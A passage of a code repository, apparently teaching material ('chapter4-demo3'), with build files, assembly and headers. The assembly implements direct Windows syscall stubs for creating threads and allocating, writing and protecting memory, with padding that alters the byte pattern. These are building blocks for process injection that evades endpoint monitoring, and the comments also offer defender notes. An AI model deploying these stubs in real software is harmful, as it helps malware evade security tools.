<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="base64.cpp" />
<ClCompile Include="demo1.cpp" />
<MASM Include="nt.asm">
<FileType>CppCode</FileType>
</MASM>
</ItemGroup>
<ItemGroup>
<ClInclude Include="base64.h" />
<ClInclude Include="Header.h" />
<ClInclude Include="nt.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Resource Files\Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="demo1.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="base64.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="Header.h">
<Filter>Resource Files</Filter>
</ClInclude>
<ClInclude Include="base64.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.h">
<Filter>Resource Files\Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<MASM Include="nt.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>
================================================
FILE: chapter4-demo3/demo1/demo1.vcxproj.user
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>
================================================
FILE: chapter4-demo3/demo1/nt.asm
================================================
.code

; Resolved in demo1.cpp: maps a name hash to an index in the sorted Zw* list.
EXTERN SW3_GetSyscallNumber: PROC

; Shared exit point for the retry stub below: it jumps here as soon as one
; attempt returns 0 (STATUS_SUCCESS in nt.h).
bye :
ret
; Hash-resolved stub (the SysWhispers-style path): spills the four register
; arguments to [rsp+8..32], asks SW3_GetSyscallNumber for the number that
; matches the hard-coded hash, restores the arguments and issues the syscall
; from inside this image. Not called by demo1.cpp, which uses ANtCTE instead.
; NOTE(review): if the hash is unknown, SW3_GetSyscallNumber returns
; 0FFFFFFFFh and that value goes into EAX unchecked.
NtCreateThreadEx PROC
    mov [rsp +8], rcx ; Save registers.
    mov [rsp+16], rdx
    mov [rsp+24], r8
    mov [rsp+32], r9
    sub rsp, 28h
    mov ecx, 03EA48B99h ; Load function hash into ECX.
    call SW3_GetSyscallNumber ; Resolve function hash into syscall number.
    add rsp, 28h
    mov rcx, [rsp+8] ; Restore registers.
    mov rdx, [rsp+16]
    mov r8, [rsp+24]
    mov r9, [rsp+32]
    mov r10, rcx
    syscall ; Invoke system call.
    ret
NtCreateThreadEx ENDP
; Hard-coded-number variant used by main(): parks the register arguments in
; r12-r15 and tries the syscall with one number per Windows build (0C1h,
; then 0BDh, then 0BCh, as labelled), jumping to `bye` after the first
; attempt that returns 0. There is no ret after the third attempt, so when
; all three fail execution falls through into BNtAVM below.
; Defender note: each failed attempt is a syscall with an error status
; issued from a return address inside this image rather than ntdll -
; visible to kernel-side telemetry even though no ntdll stub was touched.
ANtCTE proc
    mov r12, rcx
    mov r13, rdx
    mov r14, r8
    mov r15, r9
    mov r10, rcx
    xor rax, rax
    add eax, 0C1h ; 2004, 20H2
    syscall
    cmp rax, 00
    je bye
    ; Restore the arguments and retry with the next build's number.
    mov rcx, r12
    mov rdx, r13
    mov r8, r14
    mov r9, r15
    mov r10, rcx
    xor rax, rax
    add eax, 0BDh ; 1903, 1909
    syscall
    cmp rax, 00
    je bye
    mov rcx, r12
    mov rdx, r13
    mov r8, r14
    mov r9, r15
    mov r10, rcx
    xor rax, rax
    add eax, 0BCh ; 1809
    syscall
    cmp rax, 00
    je bye
ANtCTE endp
; Issues syscall number 18h (labelled "1507 +") with r10 = rcx. The extra
; mov/xor/sub instructions on r8 and r10 cancel out, presumably to perturb
; the byte pattern, except for the final `xor r8, r8`: the third argument
; (ZeroBits in the nt.h prototype) always reaches the kernel as 0.
BNtAVM proc
    mov r8, r10
    mov r10, 01h
    xor r10, r10
    mov r10, 0Ah
    mov r10, rcx
    xor eax, eax
    sub r8, r10
    add eax, 18h; 1507 +
    xor r8, r8
    syscall
    ret
BNtAVM endp
; Issues syscall number 3Ah (labelled "1507 +"). Net effect: r10 = rcx,
; eax = 3Ah; the add/sub 0Ah pairs cancel out. Declared in nt.h but not
; called by demo1.cpp.
BNtWVM proc
    add rcx, 0Ah
    xor eax, eax
    mov r10, rcx
    add eax, 3Ah; 1507 +
    sub r10, 0Ah
    sub rcx, 0Ah
    syscall
    ret
BNtWVM endp
; Issues syscall number 50h (labelled "1507 +"). Net effect: r10 = rcx,
; eax = 50h; the first `add r10, 1Ch` is overwritten and the sub/add 01h
; pair cancels out. Declared in nt.h but not called by demo1.cpp.
BNtPVM proc
    add r10, 1Ch
    xor eax, eax
    mov r10, rcx
    sub r10, 01h
    add eax, 50h; 1507 +
    add r10, 01h
    syscall
    ret
BNtPVM endp
end
================================================
FILE: chapter4-demo3/demo1/nt.h
================================================
#pragma once
#ifndef SW3_HEADER_H_
#define SW3_HEADER_H_
#include <windows.h>
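// Seed mixed into the syscall-name hash; its parity (odd here) selects the
// rotate direction used by SW3_ROX8 at compile time.
#define SW3_SEED 0xA8EC79BB
// 32-bit rotate-left / rotate-right by 8 bits. The argument is fully
// parenthesised so an expression such as SW3_ROL8(a + b) rotates the sum
// instead of letting `<<` bind tighter than `+`. The operand is assumed to
// be 32 bits wide, matching the DWORD hash in SW3_SYSCALL_ENTRY.Hash.
#define SW3_ROL8(v) (((v) << 8) | ((v) >> 24))
#define SW3_ROR8(v) (((v) >> 8) | ((v) << 24))
// Rotate direction chosen once by the seed's parity; only one branch is
// evaluated, so `v` is expanded but not executed twice.
#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))
// Capacity of SW3_SYSCALL_LIST.Entries; the list's Count must stay below this.
#define SW3_MAX_ENTRIES 500
// Converts an RVA inside a loaded image to a virtual address of the given
// pointer type; both arguments are parenthesised for the same reason as above.
#define SW3_RVA2VA(Type, DllBase, Rva) ((Type)((ULONG_PTR)(DllBase) + (Rva)))
// NTSTATUS success value; nt.asm's retry loop compares the syscall result
// against 0 for the same meaning.
#define STATUS_SUCCESS 0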
// C-callable entry points for the fixed-number stubs in nt.asm (service
// numbers 18h / 3Ah / 50h, marked "1507 +" there). The parameter lists are
// laid out like the corresponding Nt* calls so callers can use them as
// drop-in replacements for the declarations further down this header.
// NOTE(review): the asm behind BNtAVM zeroes R8 before the syscall, so
// ZeroBits is ignored; callers must pass 0 for this declaration to be honest.
EXTERN_C NTSTATUS BNtAVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
// NOTE(review): the parameter names read like a read-memory prototype
// (NumberOfBytesToRead / NumberOfBytesRead) although the stub is named as a
// write; presumably copy-pasted — NumberOfBytesToWrite / NumberOfBytesWritten
// would describe the call, and lpBuffer is the source, not the destination.
EXTERN_C NTSTATUS BNtWVM(
HANDLE hProcess,
PVOID lpBaseAddress,
PVOID lpBuffer,
SIZE_T NumberOfBytesToRead,
PSIZE_T NumberOfBytesRead
);
// Mirrors NtProtectVirtualMemory: BaseAddress and NumberOfBytesToProtect are
// in/out (rounded to page boundaries by the kernel) and the previous
// protection is returned through OldAccessProtection.
EXTERN_C NTSTATUS BNtPVM(
HANDLE ProcessHandle,
PVOID* BaseAddress,
SIZE_T* NumberOfBytesToProtect,
ULONG NewAccessProtection,
PULONG OldAccessProtection
);
// One resolved syscall: the DWORD name hash produced by SW3_HashSyscall,
// a DWORD Address (presumably an RVA — it is not pointer-sized, so it is
// only meaningful relative to the module base it was taken from) and
// SyscallAddress, presumably a code address to dispatch through; the code
// that fills these fields is not in this chunk.
typedef struct _SW3_SYSCALL_ENTRY
{
DWORD Hash;
DWORD Address;
PVOID SyscallAddress;
} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;
// Fixed-capacity table of resolved entries. Count is the number in use and
// must never exceed SW3_MAX_ENTRIES; whoever populates the list
// (SW3_PopulateSyscallList) is responsible for that bound.
typedef struct _SW3_SYSCALL_LIST
{
DWORD Count;
SW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];
} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;
// Offset-only views of the loader structures: the Reserved arrays are
// padding that positions the few fields actually used. These are not the
// winternl.h definitions and their correctness depends on the target
// build's layout — confirm before trusting the offsets.
typedef struct _SW3_PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList; // List head for the module walk (presumably done by SW3_PopulateSyscallList).
} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;
typedef struct _SW3_LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks; // Link in InMemoryOrderModuleList; entries are recovered from it via CONTAINING_RECORD-style arithmetic.
PVOID Reserved2[2];
PVOID DllBase; // Image base; the only per-module field this layout exposes.
} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;
typedef struct _SW3_PEB {
BYTE Reserved1[2];
BYTE BeingDebugged; // Declared here, but no reader of it is visible in this chunk.
BYTE Reserved2[1];
PVOID Reserved3[2];
PSW3_PEB_LDR_DATA Ldr;
} SW3_PEB, * PSW3_PEB;
// Hashes an export name into the DWORD key stored in SW3_SYSCALL_ENTRY.Hash
// (the SW3_ROX8 / SW3_SEED macros above are presumably its building blocks).
DWORD SW3_HashSyscall(PCSTR FunctionName);
// Fills the global syscall table; BOOL return presumably signals failure with
// FALSE. NOTE(review): `()` rather than `(void)` — fine in C++, but an
// unspecified parameter list if this header is ever included from C.
BOOL SW3_PopulateSyscallList();
// Returns the service number for FunctionHash. nt.asm calls this with the
// hash in ECX and uses the EAX result directly as the number for `syscall`.
EXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);
// Returns an address to dispatch through for FunctionHash (see
// SW3_SYSCALL_ENTRY.SyscallAddress); no caller is visible in this chunk.
EXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);
// WOW64 gate accessor; declared but not referenced anywhere in this chunk.
EXTERN_C PVOID internal_cleancall_wow64_gate(VOID);
// Native counted string: Length and MaximumLength are in BYTES, not
// characters, and Buffer is not required to be NUL-terminated — read it
// through Length, never with wcslen().
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _SYSTEM_HANDLE
{
ULONG ProcessId;
BYTE ObjectTypeNumber;
BYTE Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
{
PVOID pValue;
ULONG ValueLength;
} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
{
ULONG64 Version;
UNICODE_STRING Name;
} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, * PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;
typedef struct _WNF_TYPE_ID
{
GUID TypeId;
} WNF_TYPE_ID, * PWNF_TYPE_ID;
typedef enum _PS_CREATE_STATE
{
PsCreateInitialState,
PsCreateFailOnFileOpen,
PsCreateFailOnSectionCreate,
PsCreateFailExeFormat,
PsCreateFailMachineMismatch,
PsCreateFailExeName,
PsCreateSuccess,
PsCreateMaximumStates
} PS_CREATE_STATE, * PPS_CREATE_STATE;
typedef enum _KCONTINUE_TYPE
{
KCONTINUE_UNWIND,
KCONTINUE_RESUME,
KCONTINUE_LONGJUMP,
KCONTINUE_SET,
KCONTINUE_LAST
} KCONTINUE_TYPE;
typedef struct _IO_STATUS_BLOCK
{
union
{
NTSTATUS Status;
VOID* Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG HandleCount;
SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
typedef enum _PLUGPLAY_EVENT_CATEGORY
{
HardwareProfileChangeEvent,
TargetDeviceChangeEvent,
DeviceClassChangeEvent,
CustomDeviceEvent,
DeviceInstallEvent,
DeviceArrivalEvent,
PowerEvent,
VetoEvent,
BlockedDriverEvent,
InvalidIDEvent,
MaxPlugEventCategory
} PLUGPLAY_EVENT_CATEGORY, * PPLUGPLAY_EVENT_CATEGORY;
typedef enum _PNP_VETO_TYPE
{
PNP_VetoTypeUnknown, // unspecified
PNP_VetoLegacyDevice, // instance path
PNP_VetoPendingClose, // instance path
PNP_VetoWindowsApp, // module
PNP_VetoWindowsService, // service
PNP_VetoOutstandingOpen, // instance path
PNP_VetoDevice, // instance path
PNP_VetoDriver, // driver service name
PNP_VetoIllegalDeviceRequest, // instance path
PNP_VetoInsufficientPower, // unspecified
PNP_VetoNonDisableable, // instance path
PNP_VetoLegacyDriver, // service
PNP_VetoInsufficientRights // unspecified
} PNP_VETO_TYPE, * PPNP_VETO_TYPE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
{
UNICODE_STRING Name;
USHORT ValueType;
USHORT Reserved;
ULONG Flags;
ULONG ValueCount;
union
{
PLONG64 pInt64;
PULONG64 pUint64;
PUNICODE_STRING pString;
PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;
PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;
} Values;
} TOKEN_SECURITY_ATTRIBUTE_V1, * PTOKEN_SECURITY_ATTRIBUTE_V1;
typedef VOID(KNORMAL_ROUTINE) (
IN PVOID NormalContext,
IN PVOID SystemArgument1,
IN PVOID SystemArgument2);
typedef struct _PS_ATTRIBUTE
{
ULONG Attribute;
SIZE_T Size;
union
{
ULONG Value;
PVOID ValuePtr;
} u1;
PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;
typedef struct _WNF_STATE_NAME
{
ULONG Data[2];
} WNF_STATE_NAME, * PWNF_STATE_NAME;
// Fills an OBJECT_ATTRIBUTES (defined later in this header; expansion is
// deferred so the forward use is fine): p = target, n = PUNICODE_STRING
// name, a = attribute flags, r = root directory handle, s = security
// descriptor. SecurityQualityOfService is always reset to NULL.
// The macro arguments are not parenthesised, so pass simple lvalues /
// identifiers rather than compound expressions (this mirrors the SDK's
// own definition, presumably why it is guarded with #ifndef).
#ifndef InitializeObjectAttributes
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#endif
typedef struct _KEY_VALUE_ENTRY
{
PUNICODE_STRING ValueName;
ULONG DataLength;
ULONG DataOffset;
ULONG Type;
} KEY_VALUE_ENTRY, * PKEY_VALUE_ENTRY;
typedef enum _KEY_SET_INFORMATION_CLASS
{
KeyWriteTimeInformation,
KeyWow64FlagsInformation,
KeyControlFlagsInformation,
KeySetVirtualizationInformation,
KeySetDebugInformation,
KeySetHandleTagsInformation,
MaxKeySetInfoClass // MaxKeySetInfoClass should always be the last enum.
} KEY_SET_INFORMATION_CLASS, * PKEY_SET_INFORMATION_CLASS;
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemHandleInformation = 16,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45,
SystemCodeIntegrityInformation = 103,
SystemPolicyInformation = 134,
} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
typedef enum _PROCESSINFOCLASS
{
ProcessBasicInformation = 0,
ProcessDebugPort = 7,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessBreakOnTermination = 29
} PROCESSINFOCLASS, * PPROCESSINFOCLASS;
typedef struct _MEMORY_RANGE_ENTRY
{
PVOID VirtualAddress;
SIZE_T NumberOfBytes;
} MEMORY_RANGE_ENTRY, * PMEMORY_RANGE_ENTRY;
typedef struct _T2_SET_PARAMETERS_V0
{
ULONG Version;
ULONG Reserved;
LONGLONG NoWakeTolerance;
} T2_SET_PARAMETERS, * PT2_SET_PARAMETERS;
typedef struct _FILE_PATH
{
ULONG Version;
ULONG Length;
ULONG Type;
CHAR FilePath[1];
} FILE_PATH, * PFILE_PATH;
typedef struct _FILE_USER_QUOTA_INFORMATION
{
ULONG NextEntryOffset;
ULONG SidLength;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER QuotaUsed;
LARGE_INTEGER QuotaThreshold;
LARGE_INTEGER QuotaLimit;
SID Sid[1];
} FILE_USER_QUOTA_INFORMATION, * PFILE_USER_QUOTA_INFORMATION;
typedef struct _FILE_QUOTA_LIST_INFORMATION
{
ULONG NextEntryOffset;
ULONG SidLength;
SID Sid[1];
} FILE_QUOTA_LIST_INFORMATION, * PFILE_QUOTA_LIST_INFORMATION;
typedef struct _FILE_NETWORK_OPEN_INFORMATION
{
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER AllocationSize;
LARGE_INTEGER EndOfFile;
ULONG FileAttributes;
ULONG Unknown;
} FILE_NETWORK_OPEN_INFORMATION, * PFILE_NETWORK_OPEN_INFORMATION;
typedef enum _FILTER_BOOT_OPTION_OPERATION
{
FilterBootOptionOperationOpenSystemStore,
FilterBootOptionOperationSetElement,
FilterBootOptionOperationDeleteElement,
FilterBootOptionOperationMax
} FILTER_BOOT_OPTION_OPERATION, * PFILTER_BOOT_OPTION_OPERATION;
typedef enum _EVENT_TYPE
{
NotificationEvent = 0,
SynchronizationEvent = 1,
} EVENT_TYPE, * PEVENT_TYPE;
typedef struct _FILE_FULL_EA_INFORMATION
{
ULONG NextEntryOffset;
UCHAR Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[1];
} FILE_FULL_EA_INFORMATION, * PFILE_FULL_EA_INFORMATION;
typedef struct _FILE_GET_EA_INFORMATION
{
ULONG NextEntryOffset;
BYTE EaNameLength;
CHAR EaName[1];
} FILE_GET_EA_INFORMATION, * PFILE_GET_EA_INFORMATION;
typedef struct _BOOT_OPTIONS
{
ULONG Version;
ULONG Length;
ULONG Timeout;
ULONG CurrentBootEntryId;
ULONG NextBootEntryId;
WCHAR HeadlessRedirection[1];
} BOOT_OPTIONS, * PBOOT_OPTIONS;
typedef ULONG WNF_CHANGE_STAMP, * PWNF_CHANGE_STAMP;
typedef enum _WNF_DATA_SCOPE
{
WnfDataScopeSystem = 0,
WnfDataScopeSession = 1,
WnfDataScopeUser = 2,
WnfDataScopeProcess = 3,
WnfDataScopeMachine = 4
} WNF_DATA_SCOPE, * PWNF_DATA_SCOPE;
typedef enum _WNF_STATE_NAME_LIFETIME
{
WnfWellKnownStateName = 0,
WnfPermanentStateName = 1,
WnfPersistentStateName = 2,
WnfTemporaryStateName = 3
} WNF_STATE_NAME_LIFETIME, * PWNF_STATE_NAME_LIFETIME;
typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS
{
VmPrefetchInformation,
VmPagePriorityInformation,
VmCfgCallTargetInformation
} VIRTUAL_MEMORY_INFORMATION_CLASS, * PVIRTUAL_MEMORY_INFORMATION_CLASS;
typedef enum _IO_SESSION_EVENT
{
IoSessionEventIgnore,
IoSessionEventCreated,
IoSessionEventTerminated,
IoSessionEventConnected,
IoSessionEventDisconnected,
IoSessionEventLogon,
IoSessionEventLogoff,
IoSessionEventMax
} IO_SESSION_EVENT, * PIO_SESSION_EVENT;
typedef enum _PORT_INFORMATION_CLASS
{
PortBasicInformation,
#if DEVL
PortDumpInformation
#endif
} PORT_INFORMATION_CLASS, * PPORT_INFORMATION_CLASS;
typedef enum _PLUGPLAY_CONTROL_CLASS
{
PlugPlayControlEnumerateDevice,
PlugPlayControlRegisterNewDevice,
PlugPlayControlDeregisterDevice,
PlugPlayControlInitializeDevice,
PlugPlayControlStartDevice,
PlugPlayControlUnlockDevice,
PlugPlayControlQueryAndRemoveDevice,
PlugPlayControlUserResponse,
PlugPlayControlGenerateLegacyDevice,
PlugPlayControlGetInterfaceDeviceList,
PlugPlayControlProperty,
PlugPlayControlDeviceClassAssociation,
PlugPlayControlGetRelatedDevice,
PlugPlayControlGetInterfaceDeviceAlias,
PlugPlayControlDeviceStatus,
PlugPlayControlGetDeviceDepth,
PlugPlayControlQueryDeviceRelations,
PlugPlayControlTargetDeviceRelation,
PlugPlayControlQueryConflictList,
PlugPlayControlRetrieveDock,
PlugPlayControlResetDevice,
PlugPlayControlHaltDevice,
PlugPlayControlGetBlockedDriverList,
MaxPlugPlayControl
} PLUGPLAY_CONTROL_CLASS, * PPLUGPLAY_CONTROL_CLASS;
typedef enum _IO_COMPLETION_INFORMATION_CLASS
{
IoCompletionBasicInformation
} IO_COMPLETION_INFORMATION_CLASS, * PIO_COMPLETION_INFORMATION_CLASS;
typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT, * PSECTION_INHERIT;
typedef enum _DEBUGOBJECTINFOCLASS
{
DebugObjectFlags = 1,
MaxDebugObjectInfoClass
} DEBUGOBJECTINFOCLASS, * PDEBUGOBJECTINFOCLASS;
typedef enum _SEMAPHORE_INFORMATION_CLASS
{
SemaphoreBasicInformation
} SEMAPHORE_INFORMATION_CLASS, * PSEMAPHORE_INFORMATION_CLASS;
typedef struct _PS_ATTRIBUTE_LIST
{
SIZE_T TotalLength;
PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
typedef enum _VDMSERVICECLASS
{
VdmStartExecution,
VdmQueueInterrupt,
VdmDelayInterrupt,
VdmInitialize,
VdmFeatures,
VdmSetInt21Handler,
VdmQueryDir,
VdmPrinterDirectIoOpen,
VdmPrinterDirectIoClose,
VdmPrinterInitialize,
VdmSetLdtEntries,
VdmSetProcessLdtInfo,
VdmAdlibEmulation,
VdmPMCliControl,
VdmQueryVdmProcess
} VDMSERVICECLASS, * PVDMSERVICECLASS;
typedef struct _PS_CREATE_INFO
{
SIZE_T Size;
PS_CREATE_STATE State;
union
{
// PsCreateInitialState
struct {
union {
ULONG InitFlags;
struct {
UCHAR WriteOutputOnExit : 1;
UCHAR DetectManifest : 1;
UCHAR IFEOSkipDebugger : 1;
UCHAR IFEODoNotPropagateKeyState : 1;
UCHAR SpareBits1 : 4;
UCHAR SpareBits2 : 8;
USHORT ProhibitedImageCharacteristics : 16;
};
};
ACCESS_MASK AdditionalFileAccess;
} InitState;
// PsCreateFailOnSectionCreate
struct {
HANDLE FileHandle;
} FailSection;
// PsCreateFailExeFormat
struct {
USHORT DllCharacteristics;
} ExeFormat;
// PsCreateFailExeName
struct {
HANDLE IFEOKey;
} ExeName;
// PsCreateSuccess
struct {
union {
ULONG OutputFlags;
struct {
UCHAR ProtectedProcess : 1;
UCHAR AddressSpaceOverride : 1;
UCHAR DevOverrideEnabled : 1; // from Image File Execution Options
UCHAR ManifestDetected : 1;
UCHAR ProtectedProcessLight : 1;
UCHAR SpareBits1 : 3;
UCHAR SpareBits2 : 8;
USHORT SpareBits3 : 16;
};
};
HANDLE FileHandle;
HANDLE SectionHandle;
ULONGLONG UserProcessParametersNative;
ULONG UserProcessParametersWow64;
ULONG CurrentParameterFlags;
ULONGLONG PebAddressNative;
